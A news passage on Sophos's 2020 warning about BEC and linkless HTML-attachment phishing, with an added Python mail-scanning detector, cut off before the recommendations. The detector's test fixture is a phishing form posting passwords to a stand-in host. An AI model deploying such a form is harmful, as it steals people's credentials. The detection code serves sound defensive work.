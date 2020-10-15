UK-based cybersecurity firm Sophos has warned against the emergence of new email phishing scams, which sneak malware and exploits into the network, and credentials and sensitive data out.

As email continues to dominate business communications both internally and externally, it remains the most common entry point for cyberattacks, according to Sophos.

The latest data from SophosLabs showed that in September 2020, 97% of the malicious spam caught by its spam traps were phishing emails, hunting for credentials or other information.

The remaining 3% was a mixed bag of messages carrying links to malicious websites or booby-trapped attachments, variously hoping to install backdoors, remote access trojans (RATs), information stealers or exploits, or to download other malicious files.

Phishing remains a frighteningly effective tactic for attackers, as the operators behind it continue to refine their skills and enhance the sophistication of their campaigns, said Sophos.

Sophos noted two recent examples on the rise:

Business Email Compromise (BEC): No longer confined to poorly spelled or formatted messages pretending to come from the CEO and demanding the immediate and confidential transfer of significant funds, the latest iterations are subtler and smarter. The attackers are doing their groundwork before launching the attack. They get to know the business and the target executives, adopting their language style and tone, and sometimes even using actual email accounts. The absence of malicious links or attachments in such emails makes them difficult to detect with traditional security tools.

Phishing emails without links: These phishing emails bring cloned websites as HTML attachments. The attachment would simply open up the enclosed Web page in the comparative safety of the victim's browser sandbox and ask them to unwittingly fill in forms that will send off their data to websites controlled by criminals. Email passwords are among the most valuable credentials for crooks to acquire, simply because many people use their email account for password resets on a multitude of other accounts.
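A mail filter can catch the HTML-attachment pattern described above by inspecting attachments instead of links. The sketch below is an added example, not code from Sophos or the original article; the function names, the sample messages and the host `collector.example` are constructed for illustration. It flags an HTML attachment that contains a password field inside a page whose form submits to a remote host.

```python
import email
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

class FormScanner(HTMLParser):
    """Records remote hosts that forms submit to, and whether a password field exists."""
    def __init__(self):
        super().__init__()
        self.hosts, self.has_password = [], False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            host = urlparse((a.get("action") or "").strip()).netloc
            if host:  # absolute or protocol-relative URL: data leaves the local file
                self.hosts.append(host.lower())
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True

def scan_message(raw_bytes):
    """Return one finding per HTML attachment with a password form posting to a remote host."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.walk():
        name = part.get_filename() or ""
        if part.is_multipart() or part.get_content_disposition() != "attachment":
            continue
        if part.get_content_type() != "text/html" and not name.lower().endswith((".htm", ".html")):
            continue
        text = (part.get_payload(decode=True) or b"").decode(
            part.get_content_charset() or "utf-8", errors="replace")
        scanner = FormScanner()
        scanner.feed(text)
        if scanner.has_password and scanner.hosts:
            findings.append({"attachment": name, "post_hosts": scanner.hosts})
    return findings

def build_sample(html):
    """Constructed test message: plain body plus one HTML attachment named invoice.html."""
    m = EmailMessage()
    m["Subject"] = "Constructed sample"
    m.set_content("Please see the attached document.")
    m.add_attachment(html.encode(), maintype="text", subtype="html", filename="invoice.html")
    return m.as_bytes()

# Constructed inputs; collector.example is a placeholder host, not a real indicator.
PHISH = build_sample('<form action="https://collector.example/save" method="post">'
                     '<input name="u"><input type="password" name="p"></form>')
BENIGN = build_sample("<html><body><p>Quarterly report summary.</p></body></html>")

if __name__ == "__main__":
    print(scan_message(PHISH), scan_message(BENIGN))
```

A form that submits through JavaScript rather than an `action` attribute would not be caught by this check, so it works best as one signal alongside attachment-type policy.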

To avoid these new phishing scams, Sophos recommended the following: